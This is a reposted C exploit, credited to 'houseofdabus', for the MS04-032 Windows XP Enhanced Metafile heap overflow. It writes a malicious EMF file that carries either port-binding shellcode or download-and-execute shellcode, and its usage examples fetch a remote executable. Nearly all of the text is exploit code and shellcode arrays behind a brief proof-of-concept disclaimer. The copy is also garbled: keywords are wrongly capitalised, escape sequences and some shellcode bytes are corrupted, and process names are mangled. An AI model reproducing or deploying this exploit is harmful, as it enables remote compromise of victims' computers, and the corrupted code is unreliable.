[Expl] (MS04-032) Microsoft Windows XP Metafile (. EMF) Heap

--- Snip ---
/* HOD-ms04032-emf-expl2.c:
*
* (MS04-032) Microsoft Windows XP Metafile (. EMF) Heap
Overflow
*
* Exploit version 0.2 (public) coded
*
*
*.: [Houseofdabus]:.
*
*
* [At inbox dot RU]
*-------------------------------------------------------------------
* About WMF/EMF:
* Windows Metafile (WMF) and enhanced windows
Metafile (EMF) formats
* Are vector files that can contain in a raster image...
*
*-------------------------------------------------------------------
* The vulnerability will be triggered by either viewing
Malicious
* File or by navigating to a directory, which contains
Malicious
* File and displays it as a thumbnail.
*
* Graphics Rendering Engine Vulnerability-
Can-2004-0209
*-------------------------------------------------------------------
* Tested on:
*-Internet Explorer 6.0 (SP1) (ipolice.exe)
*-Explorer (assumer.exe)
*-Windows XP SP1
*
*-------------------------------------------------------------------
* Compile:
* Win32/VC ++: CL HOD-ms04032-emf-expl.c
* Win32/cygwin: GCC HOD-ms04032-emf-expl.c.
-Lws2_32.lib
* Linux: gcc-O HOD-ms04032-emf-expl
HOD-ms04032-emf-expl.c
*
*-------------------------------------------------------------------
* Command line parameters/arguments:
*
* Hod.exe <File> <shellcode> <bind/connectback port>
[Connectback IP]
*
* Shellcode:
* 1-portbind shellcode
* 2-connectback shellcode
*
*-------------------------------------------------------------------
* Examples:
*
* C:/> HOD-ms04032-emf-expl.exe expl. EMF 1 7777
*
* C:/> HOD-ms04032-emf-expl.exe expl. EMF 2
Http: // host/file.exe
*
*-------------------------------------------------------------------
*
* This is provided as proof-of-concept code only
Educational
* Purposes and testing by authorized individuals
Permission
* Do so.
*
*/
 
 
/* # DEFINE _ Win32 */
 
# Include <stdio. h>
# Include <stdlib. h>
# Include <string. h>
 
# Ifdef _ Win32
# Pragma comment (Lib, "ws2_32 ")
# Include <winsock2.h>
 
# Else
# Include <sys/types. h>
# Include <netinet/in. h>
# Include <sys/socket. h>
# Endif
 
# Include <windows. h>
 
 
Unsigned char emfheader [] =
"/X01/x00/x00/x00/X40/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/X20/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/X4c/x03/x00/x00/x4c/x03/x00/x00/x20/x45/x4d/X46/x00/x00/x01/x00"
"/X40/x00/x00/x00/x0b/x00/x00/x00/x0a/x00/x00/x00/xFF/x00/x00"
 
"/Xeb/X12/x90/x90/x90/x90/x90/x90"
"/X9e/x5c/x05/x78"/* Call [EDI + 0x74 h]-rpcrt4.dll */
"/Xb4/x73/xed/x77";/* Top Seh-XP SP1 */
 
 
Unsigned char portbind_ SC [] =
"/X90/x90/x90/x90/x90/x90/x90/x90"
 
"/Xeb/x03/x5d/xeb/x05/xe8/xf8/xFF"
"/XFF/x8b/xc5/x83/xc0/X11/x33/xc9/x66/xb9/xc9/x01/X80/x30/x88"
"/X40/xe2/xfa/xdd/x03/x64/x03/x7c/x09/x64/x08/x88/x88/x88/X60/xc4"
"/X89/x88/x88/x01/xce/x74/x77/xfe/x74/xe0/x06/xc6/x86/x64/X60/xd9"
"/X89/x88/x88/x01/xce/x4e/xe0/xbb/Xba/x88/x88/xe0/xFF/xfb/Xba/xd7"
"/Xdc/x77/xde/x4e/x01/xce/x77/xfe/x74/xe0/x25/x51/x8d/X46/X60"
"/Xb8/x89/x88/x88/x01/xce/x5a/x77/xfe/x74/xe0/xfa/x76/x3b/x9e/X60"
"/XA8/x89/x88/x88/x01/xce/X46/x77/xfe/x74/xe0/x67/X46/x68/xe8/X60"
"/X98/x89/x88/x88/x01/xce/x42/x77/xfe/a35/ xe0/x43/X65/x74/xb3/X60"
"/X88/x89/x88/x88/x01/xce/x7c/x77/xfe/XI/xe0/x51/x81/x7d/x25/X60"
"/X78/x88/x88/x88/x01/xce/x78/x77/xfe/x86/xe0/x2c/x92/xf8/x4f/X60"
"/X68/x88/x88/x88/x01/xce/x64/x77/xfe/x86/xe0/x2c/x25/xA6/x61/X60"
"/X58/x88/x88/x88/x01/xce/X60/x77/xfe/a35/ xe0/x6d/xc1/x0e/xc1/X60"
"/X48/x88/x88/x88/x01/xce/x6a/x77/xfe/a35/ xe0/x6f/xf1/x4e/xf1/X60"
"/X38/x88/x88/x88/x01/xce/x5e/xbb/x77/x09/x64/x7c/x89/x88/x88/xdc"
"/Xe0/x89/x89/x88/x88/x77/xde/x7c/xd8/xd8/xd8/xd8/xc8/xd8/xc8/xd8"
"/X77/xde/x78/x03/x50/xdf/xe0/x8a/x88/XAB/x6f/x03/x44/xe2/x9e"
"/Xd9/XDB/x77/xde/x64/xdf/XDB/x77/xde/X60/xbb/x77/xdf/xd9/XDB/x77"
"/Xde/x6a/x03/x58/x01/xce/x36/xe0/xeb/xe5/xec/x88/x01/xee/x4a/x0b"
"/X4c/x24/x05/xb4/xac/xbb/x48/xbb/x41/x08/x49/x9d/x23/x6a/x75/x4e"
"/Xcc/xac/x98/Xcc/x76/Xcc/xac/xb5/x01/xdc/xac/xc0/x01/xdc/xac/xc4"
"/X01/xdc/xac/xd8/x05/Xcc/xac/x98/xdc/xd8/xd9/xd9/xd9/xc9/xd9/xc1"
"/Xd9/xd9/x77/xfe/x4a/xd9/x77/xde/X46/x03/x44/xe2/x77/x77/xb9/x77"
"/Xde/x5a/x03/X40/x77/xfe/x36/x77/xde/x5e/x63/x16/x77/xde/x9c/xde"
"/Xec/x29/xb8/x88/x88/x88/x03/xc8/x84/x03/xf8/x94/x25/x03/xc8/X80"
"/Xd6/x4a/x8c/x88/XDB/xdd/xde/xdf/x03/xe4/xac/x90/x03/XCD/xb4/x03"
"/Xdc/x8d/xf0/x8b/x5d/x03/xc2/x90/x03/xd2/xA8/x8b/x55/x6b/Xba/xc1"
"/X03/xbc/x03/x8b/x7d/xbb/x77/x74/xbb/x48/x24/XB2/x4c/xfc/x8f/x49"
"/X47/x85/x8b/x63/x7a/xb3/xf4/xac/x9c/XFD/x69/x03/xd2/xac/x8b"
"/X55/xee/x03/x84/xc3/x03/xd2/x94/x8b/x55/x03/x8c/x03/x8b/x4d/x63"
"/X8a/xbb/x48/x03/x5d/xd7/xd6/xd5/xD3/x4a/x8c/x88 ";
 
 
Unsigned char download_ SC [] =
"/X90/x90/x90/x90/x90/x90/x90/x90"
 
"/Xeb/x0f/x58/X80/x30/x17/X40/x81/x38/x6d/x30/x30/X21/x75/xf4"
"/Xeb/x05/xe8/xec/xFF/xfe/x94/x16/x17/x17/x4a/x42/X26"
"/Xcc/x73/x9c/x14/x57/x84/x9c/x54/xe8/x57/x62/xee/x9c/x44/x14"
"/X71/X26/xc5/x71/xaf/x17/x07/x71/x96/x2d/x5a/x4d/x63/x10/x3e"
"/Xd5/xfe/xe5/xe8/xe8/xe8/x9e/xc4/x9c/x6d/x2b/x16/xc0/x14/x48"
"/X6f/x9c/x5c/x0f/x9c/x64/x37/x9c/x6c/x33/x16/xc1/x16/xc0/xeb"
"/Xba/x16/xc7/x81/x90/xea/X46/X26/xde/x97/xd6/X18/xe4/xb1/X65"
"/X1d/x81/x4e/x90/xea/x63/x05/x50/x50/xf5/xf1/xa9/X18/x17/x17"
"/X17/x3e/xd9/x3e/xe0/xfe/xFF/xe8/xe8/xe8/X26/xd7/x71/x9c/x10"
"/Xd6/xf7/x15/x9c/x64/x0b/x16/xc1/x16/XD1/Xba/x16/xc7/x9e/XD1"
"/X9e/xc0/x4a/x9a/x92/xb7/x17/x17/x17/x57/x97/x2f/x16/x62/xed"
"/XD1/x17/x17/x9a/x92/x0b/x17/x17/x17/x47/X40/xe8/xc1/x7f/x13"
"/X17/x17/x17/x7f/x17/x07/x17/x17/x7f/x68/x81/x8f/x17/x7f/x17"
"/X17/x17/x17/xe8/xc7/x9e/x92/x9a/x17/x17/x17/x9a/x92/X18/x17"
"/X17/x17/x47/X40/xe8/xc1/X40/x9a/x9a/x42/x17/x17/x17/X46/xe8"
"/Xc7/x9e/xd0/x9a/x92/x4a/x17/x17/x17/x47/X40/xe8/xc1/X26/xde"
"/X46/X46/X46/X46/X46/xe8/xc7/x9e/xd4/x9a/x92/x7c/x17/x17/x17"
"/X47/X40/xe8/xc1/X26/xde/X46/X46/X46/X46/x9a/x82/xB6/x17/x17"
"/X17/x45/x44/xe8/xc7/x9e/xd4/x9a/x92/x6b/x17/x17/x17/x47/X40"
"/Xe8/xc1/x9a/x9a/x86/x17/x17/x17/X46/x7f/x68/x81/x8f/x17/xe8"
"/Xa2/x9a/x17/x17/x17/x44/xe8/xc7/x48/x9a/x92/x3e/x17/x17/x17"
"/X47/X40/xe8/xc1/x7f/x17/x17/x17/x17/x9a/x8a/x82/x17/x17/x17"
"/X44/xe8/xc7/x9e/xd4/x9a/x92/X26/x17/x17/x17/x47/X40/xe8/xc1"
"/Xe8/xa2/x86/x17/x17/x17/xe8/xa2/x9a/x17/x17/x17/x44/xe8/xc7"
"/X9a/x92/x2e/x17/x17/x17/x47/X40/xe8/xc1/x44/xe8/xc7/x9a/x92"
"/X56/x17/x17/x17/x47/X40/xe8/xc1/x7f/X12/x17/x17/x17/x9a/x9a"
"/X82/x17/x17/x17/X46/xe8/xc7/x9a/x92/x5e/x17/x17/x17/x47/X40"
"/Xe8/xc1/x7f/x17/x17/x17/x17/xe8/xc7/xFF/x6f/xe9/xe8/xe8/x50"
"/X72/x63/x47/X65/x78/x74/x56/x73/x73/X65/x72/x64/x64/x17/x5b"
"/X78/x76/x73/x5b/x7e/x75/X65/x76/X65/x6e/x56/x17/x41/x7e/X65"
"/X63/x62/x76/x7b/x56/x7b/x7b/x78/x74/x17/x48/x7b/x74/X65/x72"
"/X76/x63/x17/x48/x7b/X60/X65/x7e/x63/x72/x17/x48/x7b/x74/x7b"
"/X78/x64/x72/x17/X40/x7e/x79/X52/x6f/x72/x74/x17/X52/x6f/x7e"
"/X63/x47/X65/x78/x74/x72/x64/x64/x17/X40/x7e/x79/x5e/x79/x72"
"/X63/x17/x5e/x79/x63/x72/X65/x79/x72/x63/x58/x67/x72/x79/x56"
"/X17/x5e/x79/x63/x72/X65/x79/x72/x63/x58/x67/x72/x79/x42/X65"
"/X7b/x56/x17/x5e/x79/x63/x72/X65/x79/x72/x63/x45/x72/x76/x73"
"/X51/x7e/x7b/x72/x17/x17/x17/x17/x17/x17/x17/x7a/x27"
"/X27/x39/x72/x6f/x72/x17" "hod"/X21 ";
 
Unsigned char endoffile [] = "/x00/x00/x00/x00 ";
 
 
Void
Usage (char * prog)
{
Printf ("Usage:/N ");
Printf ("% S <File> <shellcode> <bindport/URL>/N", prog );
Printf ("/nshellcode:/N ");
Printf ("1-portbind shellcode/N ");
Printf ("2-download & exec shellcode/n ");
Exit (0 );
}
 
 
Int
Main (INT argc, char ** argv)
{
Char endofurl = '/x01 ';
Unsigned short port;
Int SC;
File * FP;
 
Printf ("/N (MS04-032) Microsoft Windows XP Metafile
(. EMF) Heap Overflow/n ");
Printf ("--- coded by.: [houseofdabus]:. ---/n ");
 
If (argc <4) usage (argv [0]);
 
SC = atoi (argv [2]);
If (SC> 2) | (SC <1) usage (argv [0]);
 
Fp = fopen (argv [1], "WB ");
If (FP = NULL ){
Printf ("[-] error: CAN/'t Create File: % s/n", argv [1]);
Exit (0 );
}
 
/* Header */
Fwrite (emfheader, 1, sizeof (emfheader)-1, FP );
 
Printf ("[*] shellcode :");
If (SC = 1 ){
Port = atoi (argv [3]);
Printf ("portbind, Port = % u/N", Port );
Port = htons (Port ^ (unsigned short) 0x8888 );
Memcpy (portbind_ SC + 266, & Port, 2 );
Fwrite (portbind_ SC, 1, sizeof (portbind_ SC)-1, FP );
Fwrite (endoffile, 1, 4, FP );
}
Else {
Printf ("download & exec, url = % s/n", argv [3]);
Fwrite (download_ SC, 1, sizeof (download_ SC)-1,
FP );
Fwrite (argv [3], 1, strlen (argv [3]), FP );
Fwrite (& endofurl, 1, 1, FP );
Fwrite (endoffile, 1, 4, FP );
}
 
Printf ("[+] OK/N ");
Fclose (FP );
 
Return 0;
}
 
--- Snip ---